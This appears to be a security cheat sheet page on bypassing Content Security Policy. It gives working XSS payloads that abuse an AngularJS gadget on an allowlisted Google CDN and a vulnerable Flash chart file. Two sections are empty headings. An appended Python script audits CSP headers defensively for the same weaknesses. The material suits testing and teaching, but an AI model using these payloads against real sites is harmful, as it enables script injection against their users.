
[CSP HEADER BYPASS]



CSP (Content Security Policy): a way to restrict what is allowed to load and run in the application.

Notes:
1. 'self' means resources are only allowed from the same domain.
2. The CSP policy is defined in the response header; this is how the browser knows that a CSP policy is in place.
3. When testing, use the dev tools and inspect the Console tab to see whether an 'alert' notification pops up.
Bypass via ajax.googleapis.com

Sample header:
    content-security-policy: script-src 'self' ajax.googleapis.com

Payload:
    <div ng-app ng-csp id=p ng-click=$event.view.alert("XSS")><script src="//ajax.googleapis.com/ajax/libs/angularjs/1.6.6/angular.min.js"></script> <script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>

ng-app: enables AngularJS usage
ng-csp: enables AngularJS CSP mode
ng-click: enables the AngularJS click method

Explanation: the div enables some AngularJS features (ng-app / ng-csp / ng-click), which can be used because 'ajax.googleapis.com' is allowed by the policy. Since the div calls into Angular, the library has to be imported from that allowed host in order to use its functions and trigger further actions. The second, async script source provides the automatic interaction needed to fire the click event and pop up the alert.
Bypass via Flash file

Sample header:
    content-security-policy: script-src 'self'

Payload:
    <object type='application/x-shockwave-flash' data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowed Domain=\%22})))}catch(e) {alert(/XSS/)}//'><param name='AllowScriptAccess' value='always'></object>

Notes:
1. This content security policy only allows scripts from the same domain.
2. It only restricts scripts, but what about Flash files? ajax.googleapis.com is not explicitly allowed; however, it can still be called via a Flash file.
3. Each time you want to try a Flash CSP bypass you need to use the HTML 'object' tag.
4. 'charts.swf' is a Flash file vulnerable to XSS; if it does not work, you can host your own or find another one to trigger XSS.
Bypass via polyglot file

Sample header:
    content-security-policy: default-src 'self'

Bypass via AngularJS
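Added example, not part of the original wiki page: a small checker that a defender can run over a Content-Security-Policy header to flag the weaknesses the sections above rely on (an allowlisted script host such as ajax.googleapis.com, and a policy that restricts scripts but leaves object-src, and therefore Flash/plugin content, unrestricted). RISKY_SCRIPT_HOSTS is an assumed, hand-maintained list containing only the host named on this page.

```python
# Added example (not from the original page): audit a CSP header for the
# weaknesses discussed above. Assumption: RISKY_SCRIPT_HOSTS is a hand-kept
# list of CDN hosts that serve AngularJS builds / callback endpoints.
RISKY_SCRIPT_HOSTS = {"ajax.googleapis.com"}


def parse_csp(header: str) -> dict:
    """Turn "dir a b; dir2 c" into {"dir": ["a", "b"], "dir2": ["c"]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def _host(source: str) -> str:
    """Reduce a source expression to its host: https://a.b/x/ -> a.b."""
    return source.lower().split("://")[-1].split("/")[0]


def audit_csp(header: str) -> list:
    """Return human-readable findings; an empty list means nothing flagged."""
    policy = parse_csp(header)
    findings = []
    # script-src falls back to default-src; with neither, scripts are unrestricted.
    script_src = policy.get("script-src", policy.get("default-src"))
    if script_src is None:
        findings.append("script-src: missing (no default-src either), scripts unrestricted")
    else:
        if "'unsafe-inline'" in script_src:
            findings.append("script-src: 'unsafe-inline' lets injected inline scripts run")
        for source in script_src:
            if _host(source) in RISKY_SCRIPT_HOSTS:
                findings.append(f"script-src: {source} serves AngularJS and a callback "
                                "endpoint; allowlisting the whole host undermines the policy")
    # Plugin content (<object>, e.g. Flash) is governed by object-src, not
    # script-src, so a policy that only sets script-src leaves it unrestricted.
    object_src = policy.get("object-src", policy.get("default-src"))
    if object_src is None:
        findings.append("object-src: missing, plugin content is unrestricted; add object-src 'none'")
    elif object_src != ["'none'"]:
        findings.append("object-src: 'self' or a host still allows plugin files served "
                        "from that origin (e.g. an uploaded polyglot); prefer object-src 'none'")
    return findings


if __name__ == "__main__":
    for hdr in ("script-src 'self' ajax.googleapis.com", "script-src 'self'", "default-src 'self'"):
        print(hdr, "->", audit_csp(hdr) or ["ok"])
```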

©® - 2023/2024.